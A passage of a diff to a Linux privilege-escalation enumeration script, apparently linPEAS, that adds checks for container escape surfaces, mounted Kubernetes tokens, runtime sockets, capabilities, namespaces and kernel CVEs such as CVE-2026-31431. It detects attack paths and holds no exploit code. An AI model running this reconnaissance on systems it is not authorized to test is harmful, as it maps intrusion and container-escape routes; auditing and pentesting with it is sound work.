"$(cat /proc/sys/kernel/modules_disabled)" = "0" ]; then echo "Modules can be loaded" | sed -${E} "s,.*,${SED_RED},g" @@ -1978,8 +3362,44 @@ if [ -f "/proc/sys/kernel/modules_disabled" ]; then else echo_not_found "/proc/sys/kernel/modules_disabled" fi +# Check for module signature enforcement +print_3title "Module signature enforcement? " "T1547.006" +if [ -f "/proc/sys/kernel/module_sig_enforce" ]; then + if [ "$(cat /proc/sys/kernel/module_sig_enforce)" = "1" ]; then + echo "Enforced" | sed -${E} "s,.*,${SED_GREEN},g" + else + echo "Not enforced" | sed -${E} "s,.*,${SED_RED},g" + fi +elif [ -f "/sys/module/module/parameters/sig_enforce" ]; then + if [ "$(cat /sys/module/module/parameters/sig_enforce)" = "Y" ]; then + echo "Enforced" | sed -${E} "s,.*,${SED_GREEN},g" + else + echo "Not enforced" | sed -${E} "s,.*,${SED_RED},g" + fi +else + echo_not_found "module_sig_enforce" +fi echo "" +fi + +if check_mitre_filter "T1068"; then +print_2title "Checking for Copy Fail (CVE-2026-31431)" "T1068" +print_info "https://copy.fail/" +print_info "https://www.cve.org/CVERecord?id=CVE-2026-31431" +checkCopyFail +echo "" + +fi + +if check_mitre_filter "T1068"; then +print_2title "Kernel Exploit Registry" "T1068" +kercve_run_registry +echo "" + +fi + +fi fi echo '' @@ -1987,8 +3407,10 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q container; then +if check_mitre_filter "T1613,T1528,T1552.007,T1611"; then print_title "Container" -print_2title "Container related tools present (if any):" +if check_mitre_filter "T1613"; then +print_2title "Container related tools present (if any):" "T1613" # Container runtimes command -v docker command -v lxc @@ -2025,8 +3447,11 @@ command -v setcap command -v getcap echo "" +fi + +if check_mitre_filter "T1528,T1552.007"; then if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then - print_2title "Listing mounted tokens" + print_2title "Listing mounted tokens" "T1528,T1552.007" print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html" ALREADY_TOKENS="IinItialVaaluE" for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do @@ -2043,35 +3468,83 @@ if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/n done fi +fi + containerCheck -print_2title "Container details" +if check_mitre_filter "T1613,T1611"; then +print_2title "Container details" "T1613,T1611" print_list "Is this a container? ...........$NC $containerType" +has_runtime_cli() { + command -v "$1" >/dev/null 2>&1 +} +print_runtime_info() { + if has_runtime_cli "$1"; then + print_list "$2$NC " + shift 2 + warn_exec "$@" + fi +} +get_runtime_container_count() { + if has_runtime_cli "$1"; then + shift + "$@" 2>/dev/null | wc -l | tr -d ' ' + else + echo "0" + fi +} +print_running_containers() { + if [ "$1" -ne "0" ]; then + echo "$2" | sed -${E} "s,.*,${SED_RED}," + shift + shift + "$@" 2>/dev/null + echo "" + fi +} +if [ -e "/proc/vz" ] && ! [ -e "/proc/bc" ]; then + print_list "Container Runtime ..............$NC OpenVZ" +fi +if [ -f "/run/systemd/container" ]; then + print_list "Systemd Container ..............$NC $(cat /run/systemd/container)" +fi +if [ -f "/run/.containerenv" ]; then + print_list "Podman/OCI marker ..............$NC /run/.containerenv" +fi +if [ -f "/.dockerenv" ]; then + print_list "Docker marker ..................$NC /.dockerenv" +fi # Get container runtime info -if [ "$(command -v docker || echo -n '')" ]; then - print_list "Docker version ...............$NC " - warn_exec docker version - print_list "Docker info .................$NC " - warn_exec docker info -fi -if [ "$(command -v podman || echo -n '')" ]; then - print_list "Podman version ..............$NC " - warn_exec podman version - print_list "Podman info ................$NC " - warn_exec podman info -fi -if [ "$(command -v lxc || echo -n '')" ]; then - print_list "LXC version ................$NC " - warn_exec lxc version - print_list "LXC info ...................$NC " - warn_exec lxc info -fi +print_runtime_info docker "Docker version ..............." docker version +print_runtime_info docker "Docker info ................." docker info +print_runtime_info podman "Podman version .............." podman version +print_runtime_info podman "Podman info ................" podman info +print_runtime_info lxc "LXC version ................" lxc version +print_runtime_info lxc "LXC info ..................." lxc info +print_runtime_info crio "CRI-O version ..............." crio --version +print_runtime_info runc "runc version ..............." runc --version +print_runtime_info crun "crun version ..............." crun --version +print_runtime_info nerdctl "nerdctl version ............" nerdctl version +print_runtime_info crictl "crictl version ............." crictl version +print_runtime_info ctr "ctr version ................" ctr version +print_list "Interesting runtime sockets ... "$NC +enumerateDockerSockets print_list "Any running containers? ........ "$NC # Get counts of running containers for each platform -dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) -podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) -lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) -rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) -if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +dockercontainers=0 +podmancontainers=0 +lxccontainers=0 +rktcontainers=0 +nerdctlcontainers=0 +crictlcontainers=0 +ctrcontainers=0 +dockercontainers=$(get_runtime_container_count docker docker ps --format "{{.Names}}") +podmancontainers=$(get_runtime_container_count podman podman ps --format "{{.Names}}") +lxccontainers=$(get_runtime_container_count lxc lxc list -c n --format csv) +rktcontainers=$(get_runtime_container_count rkt sh -c 'rkt list 2>/dev/null | tail -n +2') +nerdctlcontainers=$(get_runtime_container_count nerdctl nerdctl ps --format "{{.Names}}") +crictlcontainers=$(get_runtime_container_count crictl crictl ps -q) +ctrcontainers=$(get_runtime_container_count ctr ctr -n k8s.io containers list -q) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ] && [ "$nerdctlcontainers" -eq "0" ] && [ "$crictlcontainers" -eq "0" ] && [ "$ctrcontainers" -eq "0" ]; then echo_no else containerCounts="" @@ -2079,45 +3552,30 @@ else if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi + if [ "$nerdctlcontainers" -ne "0" ]; then containerCounts="${containerCounts}nerdctl($nerdctlcontainers) "; fi + if [ "$crictlcontainers" -ne "0" ]; then containerCounts="${containerCounts}crictl($crictlcontainers) "; fi + if [ "$ctrcontainers" -ne "0" ]; then containerCounts="${containerCounts}ctr($ctrcontainers) "; fi echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," # List any running containers with more details - if [ "$dockercontainers" -ne "0" ]; then - echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED}," - docker ps -a 2>/dev/null - #echo "Docker Container Details" | sed -${E} "s,.*,${SED_RED}," - #docker inspect $(docker ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g" - echo "" - fi - if [ "$podmancontainers" -ne "0" ]; then - echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED}," - podman ps -a 2>/dev/null - #echo "Podman Container Details" | sed -${E} "s,.*,${SED_RED}," - #podman inspect $(podman ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g" - echo "" - fi - if [ "$lxccontainers" -ne "0" ]; then - echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED}," - lxc list 2>/dev/null - #echo "LXC Container Details" | sed -${E} "s,.*,${SED_RED}," - #lxc config show $(lxc list -c n --format csv) 2>/dev/null | grep -E "security.privileged|security.capabilities|security.syscalls" | sed -${E} "s,true|privileged|host,${SED_RED},g" - echo "" - fi - if [ "$rktcontainers" -ne "0" ]; then - echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED}," - rkt list 2>/dev/null - #echo "RKT Container Details" | sed -${E} "s,.*,${SED_RED}," - #rkt status $(rkt list --format=json 2>/dev/null | jq -r '.[].id') 2>/dev/null | grep -E "privileged|capabilities|security" | sed -${E} "s,true|privileged|host,${SED_RED},g" - echo "" - fi + print_running_containers "$dockercontainers" "Running Docker Containers" docker ps -a + print_running_containers "$podmancontainers" "Running Podman Containers" podman ps -a + print_running_containers "$lxccontainers" "Running LXC Containers" lxc list + print_running_containers "$rktcontainers" "Running RKT Containers" rkt list + print_running_containers "$nerdctlcontainers" "Running nerdctl Containers" nerdctl ps -a + print_running_containers "$crictlcontainers" "Running CRI Containers" crictl ps -a + print_running_containers "$ctrcontainers" "Running ctr Containers (k8s.io namespace)" ctr -n k8s.io containers list fi echo "" +fi + +if check_mitre_filter "T1613"; then #If docker if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" + print_2title "Docker Container details" "T1613" inDockerGroup print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets (if any):\n"$NC + print_list "Looking and enumerating runtime sockets:\n"$NC enumerateDockerSockets print_list "Docker version .................$NC$dockerVersion" checkDockerVersionExploits @@ -2130,37 +3588,104 @@ if echo "$containerType" | grep -qi "docker"; then echo "" fi if df -h | grep docker; then - print_2title "Docker Overlays" + print_2title "Docker Overlays" "T1613" df -h | grep docker fi fi +fi + +if check_mitre_filter "T1611"; then if [ "$inContainer" ]; then echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html" + print_2title "Container & breakout enumeration" "T1611" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/index.html" # Basic container info print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')" if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi - # Security mechanisms - print_3title "Security Mechanisms" - print_list "Seccomp enabled? ............... "$NC - ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," - print_list "AppArmor profile? .............. "$NC + # Hardening and isolation controls + print_3title "Hardening & isolation" "T1611" + seccomp_mode_num="$(awk '/^Seccomp:/{print $2}' /proc/self/status 2>/dev/null)" + seccomp_mode_desc="unknown" + case "$seccomp_mode_num" in + 0) seccomp_mode_desc="disabled" ;; + 1) seccomp_mode_desc="strict" ;; + 2) seccomp_mode_desc="filtering" ;; + esac + print_list "Seccomp mode ................... "$NC + (printf "%s (%s)\n" "$seccomp_mode_desc" "${seccomp_mode_num:-?}") | sed "s,disabled,${SED_RED}," | sed "s,strict,${SED_RED_YELLOW}," | sed "s,filtering,${SED_GREEN}," + if grep -q "^Seccomp_filters:" /proc/self/status 2>/dev/null; then + print_list "Seccomp filters ............... "$NC + awk '/^Seccomp_filters:/{print $2}' /proc/self/status 2>/dev/null | sed -${E} "s,^[0-9]+$,${SED_GREEN}&," + fi + no_new_privs_num="$(awk '/^NoNewPrivs:/{print $2}' /proc/self/status 2>/dev/null)" + print_list "NoNewPrivs ..................... "$NC + case "$no_new_privs_num" in + 1) printf "enabled (1)\n" | sed -${E} "s,enabled,${SED_GREEN}," ;; + 0) printf "disabled (0)\n" | sed -${E} "s,disabled,${SED_RED_YELLOW}," ;; + *) printf "unknown\n" ;; + esac + print_list "AppArmor profile ............... "$NC (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," - print_list "User proc namespace? ........... "$NC - if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi + selinux_status="disabled" + if command -v getenforce >/dev/null 2>&1; then + selinux_status="$(getenforce 2>/dev/null || echo disabled)" + elif [ -r /sys/fs/selinux/enforce ]; then + if [ "$(cat /sys/fs/selinux/enforce 2>/dev/null)" = "1" ]; then + selinux_status="Enforcing" + else + selinux_status="Permissive" + fi + fi + print_list "SELinux status ................. "$NC + printf "%s\n" "$selinux_status" | sed -${E} "s,Enforcing,${SED_GREEN},g" | sed -${E} "s,Permissive,${SED_RED_YELLOW},g" | sed -${E} "s,disabled,${SED_RED},g" + selinux_context="$(cat /proc/self/attr/current 2>/dev/null | grep -E ':' || true)" + if [ "$selinux_context" ]; then + print_list "SELinux context ................ "$NC + printf "%s\n" "$selinux_context" | sed -${E} "s,container_t|spc_t,${SED_RED_YELLOW}&,g" + fi + uid_map_value="$(cat /proc/self/uid_map 2>/dev/null)" + gid_map_value="$(cat /proc/self/gid_map 2>/dev/null)" + setgroups_value="$(cat /proc/self/setgroups 2>/dev/null)" + print_list "User namespace mappings ....... "$NC + if echo "$uid_map_value" | grep -Eq "^[[:space:]]*0[[:space:]]+0[[:space:]]+4294967295[[:space:]]*$"; then + echo "initial user namespace" | sed -${E} "s,initial user namespace,${SED_RED_YELLOW}," + elif [ "$uid_map_value" ]; then + echo "remapped user namespace" | sed -${E} "s,remapped user namespace,${SED_GREEN}," + else + echo "unknown" + fi + if [ "$uid_map_value" ]; then + echo " UID map (container -> host -> range):" + echo "$uid_map_value" | awk '{print " " $1 " -> " $2 " -> " $3}' + fi + if [ "$gid_map_value" ]; then + echo " GID map (container -> host -> range):" + echo "$gid_map_value" | awk '{print " " $1 " -> " $2 " -> " $3}' + fi + if [ "$setgroups_value" ]; then + echo " setgroups: $setgroups_value" + fi # Known vulnerabilities - print_3title "Known Vulnerabilities" + print_3title "Known Vulnerabilities" "T1611" checkContainerExploits print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," # Check for container escape tools - print_list "Container escape tools present .. "$NC - (command -v nsenter || command -v unshare || command -v chroot || command -v capsh || command -v setcap || command -v getcap || command -v docker || command -v kubectl || command -v ctr || command -v runc || command -v containerd || command -v crio || command -v podman || command -v lxc || command -v rkt || command -v nerdctl || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap|docker|kubectl|ctr|runc|containerd|crio|podman|lxc|rkt|nerdctl,${SED_RED},g" + container_breakout_tools="$( + for tool in nsenter unshare chroot capsh setcap getcap docker kubectl ctr runc containerd crio podman lxc rkt nerdctl; do + command -v "$tool" 2>/dev/null + done + )" + print_list "Container escape tools present . "$NC + if [ "$container_breakout_tools" ]; then + printf "%s\n" "$container_breakout_tools" | sed -${E} "s,.*,${SED_RED}&," + else + echo "No" + fi # Runtime vulnerabilities - print_3title "Runtime Vulnerabilities" + print_3title "Runtime Vulnerabilities" "T1611" # Check for known runtime vulnerabilities if [ "$(command -v runc || echo -n '')" ]; then print_list "Runc version ................. "$NC @@ -2190,26 +3715,28 @@ if [ "$inContainer" ]; then fi fi fi - # Mount escape vectors - print_3title "Breakout via mounts" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html" + # Mount, procfs and sysfs escape surfaces + print_3title "Mount, procfs & sysfs surfaces" "T1611" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/sensitive-host-mounts.html" checkProcSysBreakouts - print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + root_mount_mode="$(awk '$5=="/"{print $6; exit}' /proc/self/mountinfo 2>/dev/null | cut -d',' -f1)" + print_list "/proc heavily populated ........ $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "/dev heavily populated ......... $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Root filesystem mode ........... ${root_mount_mode:-unknown}\n" | sed -${E} "s,rw,${SED_RED_YELLOW}," | sed -${E} "s,ro,${SED_GREEN}," print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED}," - print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED}," - print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "release_agent breakout 3........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "release_agent surface 1 ........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "release_agent surface 2 ........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "release_agent surface 3 ........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Writable core_pattern .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Writable binfmt_misc/register .. $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Writable uevent_helper ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," # Additional mount checks - print_list "Docker socket mounted? ......... "$NC - (mount | grep -E "docker.sock|/var/run/docker.sock" || echo "No") | sed -${E} "s,Yes|docker.sock,${SED_RED}," + print_list "Mounted runtime sockets ........ "$NC + (mount | grep -E "docker.sock|containerd.sock|crio.sock|podman.sock|buildkitd.sock|kubelet.sock|firecracker-containerd.sock" || echo "No") | sed -${E} "s,docker.sock|containerd.sock|crio.sock|podman.sock|buildkitd.sock|kubelet.sock|firecracker-containerd.sock,${SED_RED},g" print_list "Common host filesystem mounted? "$NC - (mount | grep -E "host|/host|/mnt/host" || echo "No") | sed -${E} "s,Yes|host,${SED_RED}," + (mount | grep -E "host|/host|/mnt/host|/rootfs" || echo "No") | sed -${E} "s,host|/host|/mnt/host|/rootfs,${SED_RED},g" print_list "Interesting mounts ............. "$NC - mount | grep -E "docker|container|overlay|kubelet" | grep -v "proc" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g" + mount | grep -E "docker|container|overlay|kubelet|buildkit|crio|podman|/host|/rootfs" | grep -v "proc" | sed -${E} "s,docker.sock|containerd.sock|crio.sock|podman.sock|kubelet.sock|buildkitd.sock|host|rootfs|privileged,${SED_RED},g" # Check for writable mount points print_list "Writable mount points ......... "$NC mount | grep -E "rw," | grep -v "ro," | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g" @@ -2217,8 +3744,8 @@ if [ "$inContainer" ]; then print_list "Shared mount points ........... "$NC mount | grep -E "shared|slave" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g" # Capability checks - print_3title "Capability Checks" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/capabilities-abuse-escape.html" + print_3title "Capability Checks" "T1611" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/protections/capabilities.html" print_list "Dangerous capabilities ......... "$NC if [ "$(command -v capsh || echo -n '')" ]; then capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" @@ -2227,58 +3754,62 @@ if [ "$inContainer" ]; then cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" echo $ITALIC"Run capsh --decode= to decode the capabilities"$NC fi + print_list "Ambient capabilities ........... "$NC + (grep "CapAmb:" /proc/self/status 2>/dev/null | grep -v "0000000000000000" | sed "s,CapAmb:.,," || echo "No") | sed -${E} "s,No,${SED_GREEN}," | sed -${E} "s,[0-9a-fA-F]\+,${SED_RED}&," # Additional capability checks - print_list "Dangerous syscalls allowed ... "$NC + print_list "ptrace_scope (host) ........... "$NC if [ -f "/proc/sys/kernel/yama/ptrace_scope" ]; then (cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "Not found") | sed -${E} "s,0,${SED_RED}," else echo "Not found" fi - # Namespace checks - print_3title "Namespace Checks" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/namespaces/index.html" + # Namespace checks. From inside a container we often cannot prove host namespace sharing directly, + # so prefer raw namespace handles and practical indicators over misleading "host namespace = yes/no" guesses. + print_3title "Namespaces & sharing indicators" "T1611" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/protections/namespaces/index.html" print_list "Current namespaces ............. "$NC ls -l /proc/self/ns/ - print_list "Host network namespace? ........ "$NC - if [ "$(ip netns list 2>/dev/null)" ]; then - echo "Yes - Host network namespace accessible" | sed -${E} "s,Yes,${SED_RED}," + if ps -e -o pid= >/dev/null 2>&1; then + host_process_count="$(ps -e -o pid= 2>/dev/null | wc -l | tr -d ' ')" + host_process_indicators="$(ps -eo comm= 2>/dev/null | grep -E '^(systemd|init|kthreadd|dockerd|containerd|kubelet|sshd|udevd|NetworkManager|dbus-daemon)$' | sort -u)" else - echo "No" + host_process_count="$(ls -d /proc/[0-9]* 2>/dev/null | wc -l | tr -d ' ')" + host_process_indicators="$(for proc_comm in /proc/[0-9]*/comm; do cat "$proc_comm" 2>/dev/null; done | grep -E '^(systemd|init|kthreadd|dockerd|containerd|kubelet|sshd|udevd|NetworkManager|dbus-daemon)$' | sort -u)" fi - # Additional namespace checks - print_list "Host IPC namespace? ........... "$NC - if [ "$(ls -l /proc/self/ns/ipc 2>/dev/null)" = "$(ls -l /proc/1/ns/ipc 2>/dev/null)" ]; then - echo "Yes - Host IPC namespace shared" | sed -${E} "s,Yes,${SED_RED}," + print_list "Processes visible .............. $host_process_count\n" | sed -${E} "s,^[^0-9]*([5-9][0-9]|[1-9][0-9]{2,}).*,${SED_RED_YELLOW}&," + print_list "Host-like processes visible .... "$NC + if [ "$host_process_indicators" ]; then + printf "%s\n" "$host_process_indicators" | sed -${E} "s,.*,${SED_RED_YELLOW}&," else - echo "No" + echo "No obvious host daemons" fi - print_list "Host PID namespace? ........... "$NC - if [ "$(ls -l /proc/self/ns/pid 2>/dev/null)" = "$(ls -l /proc/1/ns/pid 2>/dev/null)" ]; then - echo "Yes - Host PID namespace shared" | sed -${E} "s,Yes,${SED_RED}," + print_list "Network interfaces ............. "$NC + if command -v ip >/dev/null 2>&1; then + ip -o link show 2>/dev/null | awk -F': ' '{print $2}' else - echo "No" - fi - print_list "Host UTS namespace? ........... "$NC - if [ "$(ls -l /proc/self/ns/uts 2>/dev/null)" = "$(ls -l /proc/1/ns/uts 2>/dev/null)" ]; then - echo "Yes - Host UTS namespace shared" | sed -${E} "s,Yes,${SED_RED}," - else - echo "No" + ls /sys/class/net 2>/dev/null fi + print_list "Namespace inode summary ........ "$NC + for ns in cgroup ipc mnt net pid time user uts; do + if [ -L "/proc/self/ns/$ns" ]; then + printf "%s -> %s\n" "$ns" "$(readlink "/proc/self/ns/$ns" 2>/dev/null)" + fi + done + print_list "Looking and enumerating runtime sockets:\n"$NC + enumerateDockerSockets # Additional breakout vectors - print_3title "Additional Breakout Vectors" - print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED}," - print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED}," - print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED}," + print_3title "Writable kernel helper paths" "T1611" + print_list "modprobe helper binary ......... $modprobe_binary\n" | sed -${E} "s,/.*,${SED_RED}," + print_list "modprobe path writable ......... $modprobe_config_writable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "panic_on_oom writable .......... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "suid_dumpable writable ......... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED}," print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED}," - # Check for container escape tools in PATH - print_list "Container escape tools in PATH . "$NC - (which nsenter 2>/dev/null || which unshare 2>/dev/null || which chroot 2>/dev/null || which capsh 2>/dev/null || which setcap 2>/dev/null || which getcap 2>/dev/null || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap,${SED_RED},g" - print_3title "Extra Breakout Vectors" + print_3title "Sensitive procfs/sysfs exposure" "T1611" print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," - print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED}," - print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/keys readable ............ $proc_keys_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/timer_list readable ...... $proc_timer_list_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED}," @@ -2287,6 +3818,13 @@ if [ "$inContainer" ]; then print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/firmware readable ......... $sys_firmware_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/kernel/debug present ...... $debugfs_present\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/kernel/debug readable ..... $debugfs_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/class/thermal present ..... $thermal_present\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "/sys/class/thermal readable .... $thermal_readable\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED}," @@ -2294,15 +3832,21 @@ if [ "$inContainer" ]; then print_list "Kernel version .............. "$NC uname -a | sed -${E} "s,$(uname -r),${SED_RED}," print_list "Kernel modules ............. "$NC - lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g" + if command -v lsmod >/dev/null 2>&1; then + lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g" + elif [ -r /proc/modules ]; then + cat /proc/modules | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g" + else + echo_not_found "lsmod and /proc/modules" + fi # Additional container runtime checks print_list "Container runtime sockets .. "$NC - (find /var/run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g" + (find /var/run /run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker,${SED_RED},g" print_list "Container runtime configs .. "$NC - (find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt,${SED_RED},g" + (find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker" || echo "No") | sed -${E} 